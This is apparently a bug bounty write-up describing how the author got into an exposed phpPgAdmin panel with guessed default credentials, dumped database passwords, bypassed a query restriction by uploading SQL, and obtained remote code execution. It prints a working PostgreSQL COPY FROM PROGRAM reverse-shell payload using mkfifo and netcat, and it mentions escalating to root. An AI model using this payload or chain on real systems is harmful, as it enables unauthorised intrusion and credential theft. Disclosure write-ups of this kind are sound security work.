Bug Bounty: “My Remote Code Execution”

0xJin
3 min readAug 29, 2021

--

First Step:

In first, i found my subdomain using Amass tool.

After i used ffuf tool for brute force the directories and i found an Improper access control: https://subdomain.xxx.com/phppgadmin

There was a page with need to submit credentials, user and password.

I tried some combination of user/password with googling, and thanks to google i found it. And you know? I was IN.

This was my reaction !

Access Database:

Now i got FULL access on their database, i got all password and username. Admin password and other user passoword. That’s was awesome.

But i never tried to crack some password. I tried to get a reverse shell.

SQL Injection:

In this moment i got the GUI of phppgadmin and i can execute SQL query.

But wait.. No i can’t! Because query statement block my injection, and only from localhost i can execute the query.

SQL Injection blocked!

SQL Injection Bypass:

At this point, after too much hours, i notice that i can bypass the query statement just uploading the query via upload button, and you know? The query was correctly execute!!

Successfully SQL bypass statement.

You can find this exploit in exploit-db with my name: https://www.exploit-db.com/exploits/49736 .

This is the result:

RCE

RCE done!

Remote Code Execution:

Ok now that the RCE was DONE! I was trying to get and iShell (Interactive shell) or reverse shell. So i tryind to find with my RCE if there is NC (netcat) on their kernel installed , with command: which nc and the output was /usr/bin/nc.

Second reaction!

At this point i just change the payload with my IP and PORT, my payload was: COPY cmd_exec FROM PROGRAM ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [$MyIp] [$MyPort]>/tmp/f’;

And i WAS IN! Got localhost! But i was default user “postgres” .

I notice with “uname -a” that the kernel was vulnerable with a local privilege escalation exploit.

And i notice i can escape from postgres because runs under root.

So i could get root!

Thanks guys! Follow me on Twitter: @0xJin

In the final this was reported:

Resolved!
Buy me a coffe if you like it :)

--

--

0xJin

| eCPTX | C|EH Master | CompTIA Security + | eJPT |